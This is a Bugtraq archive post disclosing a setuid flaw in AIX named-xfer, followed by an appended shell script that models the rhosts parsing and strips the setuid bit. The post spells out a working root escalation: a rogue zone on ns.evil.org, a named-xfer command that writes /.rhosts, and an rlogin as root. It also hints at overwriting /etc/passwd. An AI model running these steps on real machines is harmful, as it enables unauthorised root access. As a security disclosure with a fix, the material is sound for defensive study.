Bugtraq mailing list archives

named-xfer hole on AIX (fwd)


From: amonk () GNUTEC COM (Kyle Amon)
Date: Thu, 23 Sep 1999 11:57:32 -0400


Aleph,

I thought I posted this to the list almost two years ago, but I never saw
it show up and it hasn't turned up in any of the usual archives of such
things.  I didn't bother to save a copy so I just figured, oh well.  It
turns out a friend that I sent it to saved a copy, so here it is again
(below) for the sake of posterity.

- Kyle

Kyle Amon                     email: amonk () gnutec com
                              url:   http://www.gnutec.com/~amonk
KeyID 1024/26DD13D9
Fingerprint = 7D 86 D1 AE 4B E9 91 6A  4B BC B5 B4 12 F0 D3 1A

            ________  _______    ________  ________            __    __
           / ______/ / ____  \  / ______/ / ______/           /  \  / /
          / /_____  / /____/ / / /_____  / /_____            / /\ \/ /
         / ______/ / __  ___/ / ______/ / ______/           /_/  \__/
        / /       / /  \ \   / /_____  / /_____            ________
       /_/       /_/    \_\ /_______/ /_______/           / ____  /
      __   __   _______  __    __  ______        __      / /___/ /  __
     / / _/_/  / _____/ / /   / / /_  __/ /\    / /     /_______/  /  \
    / /_/_/   / /____  / /   / /   / /   /  \  / /     __    __    |  |
   / _  /    / _____/ / /  _/_/   / /   / /\ \/ /     / /_  / /     \/
  / / \ \   / /____   \ \_/_/  __/ /_  / /  \  /     ( (/_\/ /
 /_/   \_\ /______/    \__/   /_____/ /_/    \/       \_/ \_/       ()

 A man denied legal counsel, held without bail or trial, is a political
   prisoner in any country, especially the United States of America!

                     http://www.kevinmitnick.com
                      http://www.2600.com/kevin

   Petition to Microsoft Corporation for Open Source Consumer Windows!
        http://www.linuxresources.com/linuxreview/petition.html

---------- Forwarded message ----------
Date: Thu, 18 Feb 1999 22:08:12 -0500 (EST)
From: Cherie Earnest <cherie () gnutec com>
To: Kyle Amon <amonk () gnutec com>
Subject: named-xfer hole on AIX (fwd)

---------- Forwarded message ----------
Date: Thu, 8 Jan 1998 07:58:48 -0500 (EST)
From: amonk () raleigh ibm com
To: cherie () gnutec com
Subject: named-xfer hole on AIX (fwd)

Friends, Romans, Geeks,

I don't know if anyone's noticed this before, but if so I ain't heard
about it so here goes nuthin... :-)

On AIX, named-xfer has the following permissions...

-r-sr-xr--   1 root     system     32578 Feb 18 1997  /usr/sbin/named-xfer

which of course means that only root and members of the system group have
execute permission but that (since the SUID bit is set) it executes as
root even when run by non-root members of the system group.  So, although
one would have to already be a member of the system group (or manage to
obtain such status) in order to exploit the problem described here, it's
still a rather significant problem.  And it's much worse than the old
sendmail -C problem which was still exploitable in AIX up until very
recently when one was a member of the system group.  The big difference
here being that sendmail -C only let one read files they shouldn't have
been able to read whereas this problem lets one write them :-).

The problem is that named-xfer writes its resulting zone file (when using
the -f option) without (or at least before) relinquishing its root
privilege (and I doubt it ever relinquishes it since it doesn't really
need it in the first place).

So, for example, if one were to set up a zone at ns.evil.org in the
following manner...

putting this in the named.boot file...

primary    +       db.hack

and giving db.hack contents as follows...

@                IN        SOA      evil.org. nsa.evil.org. (
                                    666        ; Serial
                                    10800      ; Refresh
                                    3600       ; Retry
                                    3600000    ; Expire
                                    86400 )    ; Minimum TTL

then run a command like this on some victim AIX machine...

named-xfer -z + -f /.rhosts ns.evil.org

they will put this file in root's home directory... :-)

-rw-r--r--   1 root     system       155 Jan  8 03:52 .rhosts

with contents of this... :-)

; zone '+'   last serial 0
; from 10.10.10.10   at Thu Jan  8 03:52:19 1998
$ORIGIN .
+               IN      SOA     evil.org. nsa.evil.org. (
                666 10800 3600 3600000 86400 )

All they need do then is create a user like this (anywhere)...

IN:!:666:1::/home/IN:/bin/ksh

and login or su to it then rlogin to victim AIX machine as root! :-)

Isn't that special?

So now we have reason number 9999 not to run the BSD "r" commands on
our machines.  And as I'm sure you all know, this is but one semi-creative
use for this.  I'm sure the gentle reader will be able to come up with
a handful of others... and the not so gentle reader will immediately see
possibilities for overwriting the /etc/passwd file or the kernel. :-(

Now, lest you think me a true cad, the simple fix is that the damn thing
doesn't need its SUID bit set in order to work (why it comes with it on,
I couldn't imagine).  So, check yer boxes boys n girls and dump this here
bit from this here program. :-)

Best Regards,

Kyle

P.S.  I only verified this on AIX 4.1.5 and 4.2.1 but it is likely a
      pervasive problem.

Kyle Amon                     email: amonk () raleigh ibm com
Unix Systems Administrator    phone: (203) 486-3290
Security Specialist           pager: 1-800-759-8888 PIN 1616512
IBM Global Services                  or 1616512 () skymail com
                              email: amonk () gnutec com
                              url:   http://www.gnutec.com/kyle
KeyID 1024/173D96C9
Fingerprint = 90 4F 0B D4 2D 37 E7 61  1A 31 7B F2 72 04 66 1A

Windows 95:  A 32-bit patch for a 16-bit GUI shell running on top of an
             8-bit operating system written for a 4-bit processor by a
             2-bit company who cannot stand 1 bit of competition.
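
As an added example (not part of Kyle's post, nor code from AIX or BIND), the following POSIX shell script models the two technical points the post makes: why the zone file that "named-xfer -f" drops into /.rhosts is accepted as an rhosts entry letting a user named IN in from any host, and how to find and strip the setuid-plus-group-execute mode the post describes. Assumptions: the rhosts check is a deliberately simplified model of BSD ruserok() (no "-" negation, no netgroups, no hostname canonicalisation); the rhosts contents are reproduced from the post's listing as constructed input; and the named-xfer binary is stood in for by an empty temporary file so the script runs anywhere without root or DNS.

```shell
#!/bin/sh
# Added example (not from the post): model both halves of the attack
# described above, then the one-line fix.

# ---- 1. Why the dropped zone file works as /.rhosts -----------------------
# Simplified model of the BSD ruserok() line check (assumption: no "-"
# negation, no netgroups, no hostname canonicalisation). Each .rhosts line
# is "host [user]"; "+" is a wildcard; a line with no user field only
# matches when the remote user name equals the local one.
#   usage: rhosts_allows FILE RHOST RUSER LUSER   -> exit 0 if access granted
rhosts_allows() {
    awk -v h="$2" -v ru="$3" -v lu="$4" '
        BEGIN { found = 0 }
        /^#/ || NF == 0 { next }          # "#" starts a comment; ";" does NOT
        {
            hok = ($1 == "+" || $1 == h)
            if (NF >= 2) uok = ($2 == "+" || $2 == ru)
            else         uok = (ru == lu)
            if (hok && uok) { found = 1; exit }
        }
        END { exit (found ? 0 : 1) }' "$1"
}

# The file the post shows named-xfer writing, reproduced as constructed
# sample input (no DNS involved). Its fourth line parses as host "+" (any
# host) and user "IN", which is why creating a user called IN is enough.
write_sample_rhosts() {
    cat > "$1" <<'EOF'
; zone '+'   last serial 0
; from 10.10.10.10   at Thu Jan  8 03:52:19 1998
$ORIGIN .
+               IN      SOA     evil.org. nsa.evil.org. (
                666 10800 3600 3600000 86400 )
EOF
}

# ---- 2. Finding and fixing the setuid exposure ----------------------------
# Flags a file whose mode is setuid AND group-executable: every member of
# the owning group runs it as the owner (the -r-sr-xr-- case in the post).
#   usage: suid_group_exec FILE   -> exit 0 if the pattern is present
suid_group_exec() {
    [ -u "$1" ] || return 1                       # no setuid bit at all
    mode=$(ls -ld "$1" | cut -c1-10)              # e.g. -r-sr-xr--
    case "$mode" in
        ??????[xs]???) return 0 ;;                # 7th char: group execute
        *)             return 1 ;;
    esac
}

# The fix the post recommends: clear the setuid bit and leave the rest alone.
drop_suid() {
    chmod u-s "$1" && ! [ -u "$1" ]
}

# ---- demo ----------------------------------------------------------------
demo() {
    d=$(mktemp -d)
    write_sample_rhosts "$d/rhosts"
    if rhosts_allows "$d/rhosts" ns.evil.org IN root; then
        echo "rlogin as root from ns.evil.org as remote user IN: ALLOWED"
    fi
    if ! rhosts_allows "$d/rhosts" ns.evil.org nobody root; then
        echo "... as remote user nobody: denied"
    fi
    : > "$d/named-xfer"                           # stand-in for the binary
    chmod 4550 "$d/named-xfer"                    # -r-sr-x--- as shipped
    suid_group_exec "$d/named-xfer" && echo "setuid + group exec: exposed"
    drop_suid "$d/named-xfer" && echo "after chmod u-s: $(ls -ld "$d/named-xfer" | cut -c1-10)"
    rm -rf "$d"
}
demo
```

The comment-syntax point matters: rhosts treats "#" as a comment but not ";", so the two header lines named-xfer writes are harmless only because their first token (";") is not a hostname, while the SOA line itself is a perfectly valid "+ IN" entry. On a real box, run suid_group_exec against /usr/sbin/named-xfer and, if it reports exposed, chmod u-s it as the post says.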

